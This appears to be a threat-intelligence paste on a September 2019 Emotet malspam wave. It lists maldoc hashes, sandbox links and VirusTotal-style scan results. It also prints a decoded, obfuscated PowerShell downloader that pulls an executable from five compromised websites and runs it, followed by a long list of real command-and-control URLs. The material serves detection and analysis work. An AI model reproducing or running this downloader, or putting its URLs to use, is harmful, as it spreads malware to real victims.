HerbieZimmerman

2019-09-18 Emotet

Sep 18th, 2019
Github repo with maldocs: https://github.com/bloomer1016/2019-09-18-Emotet/tree/master

Any.Run results for some
=========================
https://app.any.run/tasks/5d921b3e-fc42-48fd-96b4-a0c84c6df7ca
https://app.any.run/tasks/a95d5234-04a9-4a86-b284-3189e92fad31
https://app.any.run/tasks/3bdf63a3-755a-4819-ad82-5dc24b75afb7

Maldoc name and hashes
=======================
844545613263975.doc = d0549a23f032dd31c0b4f6ce52dc2b68
BL_4FGY5QJ54MQ.doc = 611e1f0d8d8b5ea6021b80c57521dd5f
BL_B5HP885M08_HB.doc = 2792353f03a08766d5a8a5cfcdc11755
Documents503562.doc = c23fef65dca1134add0911598e144962
FT_GNVGZ8X52TM.doc = 11aeba89608c7a1c76c03124c0deb224
FT_Q8I5N0EAY6.doc = 23709a5f4e852eb64e8cb16bef0b4af3
LLC_6001165714_L_09182019.doc = 8264fee8922f4a49728da27c23915c04
RE_A5V5YRMEMG7EEN_09182019.doc = e0ebff22ce0e5083669ed163017610a3
SCANMR-35747.doc = b06323ecc2d3d3c7520adddcede27b23
info-09_18_2019233916.doc = 890b71c6603640a7b6afb9a1aa2c4db9

Munin results
==============
Online Hash Checker for Virustotal and Other Services
Florian Roth - 0.13.0 April 2019


[+] Writing results to new file: check-results_attach.csv
[ ] Processing /attach/FT_Q8I5N0EAY6.doc ...
[ ] Processing /attach/SCANMR-35747.doc ...
[ ] Processing /attach/LLC_6001165714_L_09182019.doc ...
[ ] Processing /attach/info-09_18_2019233916.doc ...
[ ] Processing /attach/BL_B5HP885M08_HB.doc ...
[ ] Processing /attach/FT_GNVGZ8X52TM.doc ...
[ ] Processing /attach/844545613263975.doc ...
[ ] Processing /attach/RE_A5V5YRMEMG7EEN_09182019.doc ...
[ ] Processing /attach/BL_4FGY5QJ54MQ.doc ...
[ ] Processing /attach/Documents503562.doc ...
[+] Processing 10 lines ...

1 / 10 > Unknown
HASH: 19aafd3b374956bb8ed67f231e0bb5797143e23f37617e66784cb29c3c6a10dd COMMENT: /attach/FT_Q8I5N0EAY6.doc
RESULT: - / -

2 / 10 > Malicious
HASH: f4903ce8ea06e78db686bccd687857f7129f425cb03b79ac39ee6a7ad5567d2e COMMENT: /attach/SCANMR-35747.doc
VIRUS: Microsoft: Trojan:Script/Conteban.A!ml / TrendMicro: HEUR_VBA.O2
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-18 19:50:41 COMMENTS: 0 USERS: -
RESULT: 16 / 56

3 / 10 > Malicious
HASH: 6dba64beab05a8cbbbb0c7ed465447c1ddd4484daa784737860f48b3c835336e COMMENT: /attach/LLC_6001165714_L_09182019.doc
VIRUS: Microsoft: Trojan:O97M/Sonbokli.A!cl / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-18 19:11:50 COMMENTS: 0 USERS: -
RESULT: 14 / 58

4 / 10 > Unknown
HASH: 44193897b15e5b25abd4fdaec44923b9b44eef2d49b330934bc47f91d6a82107 COMMENT: /attach/info-09_18_2019233916.doc
RESULT: - / -

5 / 10 > Unknown
HASH: 7b2142363813a41fd3a512ca6bbd2e3d73d274558f58ca990d78a1537ebfcbd8 COMMENT: /attach/BL_B5HP885M08_HB.doc
RESULT: - / -

6 / 10 > Malicious
HASH: 4a89881dbe35b5b96414f7f258ce83bb65b908330a2d01a73a38996cf4766345 COMMENT: /attach/FT_GNVGZ8X52TM.doc
VIRUS: Microsoft: Trojan:Script/Oneeva.A!ml / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-18 18:01:08 COMMENTS: 0 USERS: -
RESULT: 14 / 56

7 / 10 > Unknown
HASH: 5c39f7d201d031baea0aa681c8b159c59beaca86729cb6cbaaa1b3d30b7386ed COMMENT: /attach/844545613263975.doc
RESULT: - / -

8 / 10 > Malicious
HASH: 4b00391f7bbb49f146f425f7beb285222e26de316b87e4fd8e70e490015a1bec COMMENT: /attach/RE_A5V5YRMEMG7EEN_09182019.doc
VIRUS: Microsoft: Trojan:Win32/Ludicrouz.O / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-18 18:09:01 COMMENTS: 0 USERS: -
RESULT: 14 / 58

9 / 10 > Malicious
HASH: e52d9448e78d875f07fc9cdbe18ebbf755a69b95aec37d147d0ce509de3e7c66 COMMENT: /attach/BL_4FGY5QJ54MQ.doc
VIRUS: Microsoft: Trojan:O97M/Sonbokli.A!cl / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-18 18:03:11 COMMENTS: 0 USERS: -
RESULT: 13 / 58

10 / 10 > Malicious
HASH: 42f0de30c375368ea3c82c734129cf1902476f44404e4d7eaef3bfd5f1a1cf8a COMMENT: /attach/Documents503562.doc
VIRUS: Microsoft: Trojan:Script/Oneeva.A!ml / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
TYPE: - FILENAMES: -
FIRST: - LAST: 2019-09-18 17:33:40 COMMENTS: 0 USERS: -
RESULT: 16 / 59

PoSH encoded command
=====================

Decoded PoSH command
====================
$Pai1Ui13='pATcSjl'
$wiaYWE = '133'
$jL_KnSZ2='dbtZD3ui'
$G2wvAOC=$env:userprofile+'\'+$wiaYWE+'.exe'
$z5EwO2v='szOGPK'
$Q8kzjz0=&('new-obje'+'c'+'t') neT.weBclIEnT
$nbLONdWV='https://www.patrickglobalusa.com/wp-admin/fSRkAFjqv/
https://pipizhanzhang.com/wp-admin/3ciornz_iulayscz-679646/
https://tankhoi.vn/wp-includes/XTSugzNaz/
https://www.supercrystal.am/wp-admin/PdMInSgs/
https://hotel-bristol.lu/dlry/MAnJIPnY/'."Sp`lit"('
')
$QNBE_r9='O5Za1CU'
foreach($S6f8RWR in $nbLONdWV){try{$Q8kzjz0."d`OW`NlOAD`FiLE"($S6f8RWR, $G2wvAOC)
$pHL7wh='QLVVdP8'
If ((.('Ge'+'t-'+'Item') $G2wvAOC)."LE`NGTH" -ge 28807) {[Diagnostics.Process]::"StA`RT"($G2wvAOC)
$oS9MG93='E1Bu6jOX'
break
$TbfJaY='Bzpc_Zs'}}catch{}}$DmAOEN='mRbb1P38'

C2 traffic
=============
POST http://190.18.146.70/mult/cookies/
POST http://187.147.50.167:8080/entries/odbc/
POST http://178.254.6.27:7080/ban/codec/sess/merge/
POST http://92.222.125.16:7080/tpt/tpt/sess/
POST http://142.44.162.209:8080/ringin/
POST http://31.12.67.62:7080/arizona/
POST http://45.123.3.54:443/pnp/
POST http://201.250.11.236:50000/codec/
POST http://41.220.119.246/jit/
POST http://86.98.25.30:53/arizona/
POST http://37.157.194.134:443/teapot/
POST http://187.144.189.58:50000/codec/
POST http://189.209.217.49/jit/
POST http://31.172.240.91:8080/arizona/
POST http://104.131.11.150:8080/teapot/
POST http://59.152.93.46:443/site/
POST http://222.214.218.192:8080/arizona/
POST http://162.243.125.212:8080/teapot/
POST http://169.239.182.217:8080/site/
POST http://85.104.59.244:20/xian/
POST http://95.128.43.213:8080/arizona/
POST http://91.92.191.134:8080/site/
POST http://144.139.247.220/xian/
POST http://87.230.19.21:8080/loadan/
POST http://117.197.124.36:443/teapot/
POST http://173.212.203.26:8080/site/
POST http://206.189.98.125:8080/xian/
POST http://45.33.49.124:443/loadan/
POST http://62.75.187.192:8080/codec/iplk/sess/merge/
POST http://136.243.177.26:8080/iplk/psec/sess/
POST http://91.205.215.66:8080/usbccid/badge/
POST http://186.4.172.5:443/iplk/balloon/sess/
POST http://185.129.92.210:7080/vermont/
POST http://182.176.132.213:8090/report/
POST http://87.106.139.101:8080/child/
POST http://87.106.136.232:8080/dma/
POST http://188.166.253.46:8080/iplk/
POST http://37.208.39.59:7080/child/
POST http://185.94.252.13:443/attrib/merge/sess/
POST http://175.100.138.82:22/pdf/sym/
POST http://78.24.219.147:8080/attrib/bml/sess/
POST http://201.212.57.109/pnp/
POST http://217.160.182.191:8080/entries/
POST http://186.4.172.5:8080/forced/
POST http://138.201.140.110:8080/mult/
POST http://182.76.6.2:8080/health/
POST http://190.145.67.134:8090/acquire/
POST http://47.41.213.2:22/entries/
POST http://159.65.25.128:8080/forced/
POST http://75.127.14.170:8080/ringin/
POST http://190.201.164.223:53/mult/
POST http://94.205.247.10/health/
POST http://177.246.193.139:20/entries/
POST http://149.202.153.252:8080/forced/
POST http://88.156.97.210/ringin/
POST http://178.79.161.166:443/mult/
POST http://46.105.131.87/health/
POST http://211.63.71.72:8080/cab/prep/sess/
POST http://179.32.19.219:22/enable/publish/sess/merge/
POST http://190.186.203.55/arizona/iab/sess/merge/
POST http://104.236.246.93:8080/publish/schema/sess/
POST http://92.222.216.44:8080/psec/
POST http://212.71.234.16:8080/raster/
POST http://182.176.106.43:995/entries/
POST http://190.18.146.70/sess/
POST http://187.147.50.167:8080/enable/
POST http://178.254.6.27:7080/raster/
POST http://92.222.125.16:7080/entries/
POST http://142.44.162.209:8080/tlb/
POST http://31.12.67.62:7080/sess/
POST http://45.123.3.54:443/enable/
POST http://201.250.11.236:50000/health/
POST http://41.220.119.246/raster/
POST http://86.98.25.30:53/glitch/
POST http://37.157.194.134:443/tlb/
POST http://187.144.189.58:50000/sess/
POST http://189.209.217.49/enable/
POST http://31.172.240.91:8080/health/
POST http://104.131.11.150:8080/raster/
POST http://59.152.93.46:443/glitch/
POST http://222.214.218.192:8080/sess/
POST http://162.243.125.212:8080/enable/
POST http://169.239.182.217:8080/codec/
POST http://85.104.59.244:20/raster/
POST http://95.128.43.213:8080/glitch/
POST http://91.92.191.134:8080/srvc/
POST http://144.139.247.220/enable/
POST http://87.230.19.21:8080/codec/
POST http://117.197.124.36:443/scripts/
POST http://173.212.203.26:8080/glitch/
POST http://206.189.98.125:8080/arizona/
POST http://45.33.49.124:443/srvc/
POST http://62.75.187.192:8080/schema/arizona/ringin/merge/
POST http://136.243.177.26:8080/devices/loadan/ringin/
POST http://91.205.215.66:8080/devices/free/
POST http://186.4.172.5:443/prep/jit/ringin/
POST http://185.129.92.210:7080/json/add/ringin/merge/
POST http://182.176.132.213:8090/mult/stubs/
POST http://87.106.139.101:8080/acquire/ringin/ringin/merge/
POST http://87.106.136.232:8080/xian/prep/ringin/merge/
POST http://188.166.253.46:8080/raster/publish/ringin/
POST http://37.208.39.59:7080/vermont/
POST http://185.94.252.13:443/iab/
POST http://175.100.138.82:22/between/
POST http://78.24.219.147:8080/enabled/
POST http://201.212.57.109/vermont/
POST http://217.160.182.191:8080/iab/
POST http://186.4.172.5:8080/between/
POST http://138.201.140.110:8080/vermont/
POST http://182.76.6.2:8080/iab/
POST http://190.145.67.134:8090/between/
POST http://47.41.213.2:22/enabled/
POST http://159.65.25.128:8080/vermont/
POST http://75.127.14.170:8080/schema/
POST http://190.201.164.223:53/between/
POST http://94.205.247.10/enabled/
POST http://177.246.193.139:20/schema/
POST http://149.202.153.252:8080/between/
POST http://88.156.97.210/sym/
POST http://178.79.161.166:443/prov/
POST http://46.105.131.87/schema/
POST http://211.63.71.72:8080/between/
POST http://179.32.19.219:22/sym/
POST http://190.186.203.55/prov/
POST http://104.236.246.93:8080/publish/free/ringin/merge/
POST http://92.222.216.44:8080/pnp/add/
POST http://212.71.234.16:8080/attrib/stubs/ringin/merge/
POST http://182.176.106.43:995/enable/ringin/ringin/merge/
POST http://190.18.146.70/taskbar/
POST http://187.147.50.167:8080/ban/schema/ringin/
POST http://178.254.6.27:7080/walk/prov/ringin/
POST http://92.222.125.16:7080/codec/
POST http://142.44.162.209:8080/ringin/
POST http://31.12.67.62:7080/add/